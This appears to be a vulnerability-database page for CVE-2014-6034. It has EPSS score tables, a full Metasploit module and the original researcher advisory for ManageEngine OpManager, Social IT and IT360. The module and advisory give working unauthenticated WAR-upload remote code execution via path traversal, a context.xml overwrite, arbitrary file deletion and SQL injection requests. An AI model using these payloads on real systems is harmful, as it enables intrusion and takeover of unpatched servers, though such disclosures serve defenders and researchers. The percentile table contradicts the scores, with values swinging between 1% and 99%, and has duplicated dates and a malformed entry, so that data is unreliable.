CVE-2014-6034 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	76.81%	–	–
2023-03-12	–	–	–	97.1%	–
2023-07-02	–	–	–	97.03%	–
2023-08-13	–	–	–	96.75%	–
2023-09-24	–	–	–	96.62%	–
2023-11-05	–	–	–	96.62%	–
2023-11-12	–	–	–	96.32%	–
2023-12-31	–	–	–	96.2%	–
2024-02-18	–	–	–	96.48%	–
2024-04-14	–	–	–	96.29%	–
2024-06-02	–	–	–	96.29%	–
2024-07-21	–	–	–	96.52%	–
2024-09-01	–	–	–	96.46%	–
2024-10-20	–	–	–	96.42%	–
2024-12-08	–	–	–	95.39%	–
2024-12-22	–	–	–	95.61%	–
2025-01-26	–	–	–	95.51%	–
2025-03-09	–	–	–	95.92%	–
2025-01-19	–	–	–	95.61%	–
2025-01-25	–	–	–	95.51%	–
2025-03-09	–	–	–	95.92%	–
2025-03-18	–	–	–	–	89.05%
2025-03-30	–	–	–	–	88.82%
2025-04-08	–	–	–	–	89.33%
2025-04-15	–	–	–	–	89.33%
2025-05-01	–	–	–	–	89.33%
2025-05-01	–	–	–	–	89.33,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	1%
2023-07-02	1%
2023-08-13	1%
2023-09-24	99%
2023-11-05	1%
2023-11-12	99%
2023-12-31	99%
2024-02-18	1%
2024-04-14	1%
2024-06-02	1%
2024-07-21	1%
2024-09-01	1%
2024-10-20	1%
2024-12-08	99%
2024-12-22	1%
2025-01-26	1%
2025-03-09	1%
2025-01-19	1%
2025-01-25	1%
2025-03-09	1%
2025-03-18	1%
2025-03-30	99%
2025-04-08	1%
2025-04-15	99%
2025-05-01	1%
2025-05-01	1%

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. The vulnerability exists in the FileCollector servlet which accepts unauthenticated file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on version 11.0 of SocialIT for Windows and Linux. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-6034' ], [ 'OSVDB', '112276' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] ], 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 27 2014')) register_options( [ Opt::RPORT(80), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]), ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"), 'method' => 'GET' }) # A GET request on this servlet returns "405 Method not allowed" if res and res.code == 405 return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def upload_war_and_exec(try_again, app_base) tomcat_path = '../../../tomcat/' servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' if try_again # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. print_status("#{peer} - Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, 'ctype' => 'application/xml', 'vars_get' => { 'regionID' => tomcat_path + "conf", 'FILENAME' => "context.xml" } }) else # We need to create the upload directories before our first attempt to upload the WAR. print_status("#{peer} - Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', 'data' => rand_text_alphanumeric(4 + rand(32 - 4)), 'ctype' => 'application/xml', 'vars_get' => { 'regionID' => "", 'FILENAME' => bogus_file } }) register_files_for_cleanup("state/archivedata/zip/" + bogus_file) end war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'regionID' => tomcat_path + "webapps", 'FILENAME' => app_base + ".war" } }) # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed") end print_status("#{peer} - Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) end def exploit app_base = rand_text_alphanumeric(4 + rand(32 - 4)) upload_war_and_exec(false, app_base) register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war") sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] print_error("#{peer} - Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end sleep(1) sleep_counter += 1 end end end

>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ========================================================================== Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014 >> Background on the affected products: "ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation." "Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly." "Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration." >> Technical details: #1 Vulnerability: Remote code execution via WAR file upload Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 a) CVE-2014-6034 POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war <... WAR file payload ...> Affected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4 A Metasploit module that exploits this vulnerability has been released. b) CVE-2014-6035 POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war <... WAR file payload ...> Affected versions: OpManager v? to v11.4 #2 Vulnerability: Arbitrary file deletion CVE-2014-6036 Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 Affected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4 POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini #3 Vulnerability: Remote code execution via file upload CVE-2014-7866 Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 a) POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00 <... WAR file payload ...> Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0 b) POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00 <... WAR file payload ...> Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0 #4 Vulnerability: Blind SQL injection CVE-2014-7868 Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 a) POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi] POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+ Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0) b) POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db! POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text) Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0) >> Fix: Upgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C]. This patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4). The fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released. [A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix Resolves #1 and #2 [B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix Resolves #3 [C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability Resolves #4 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>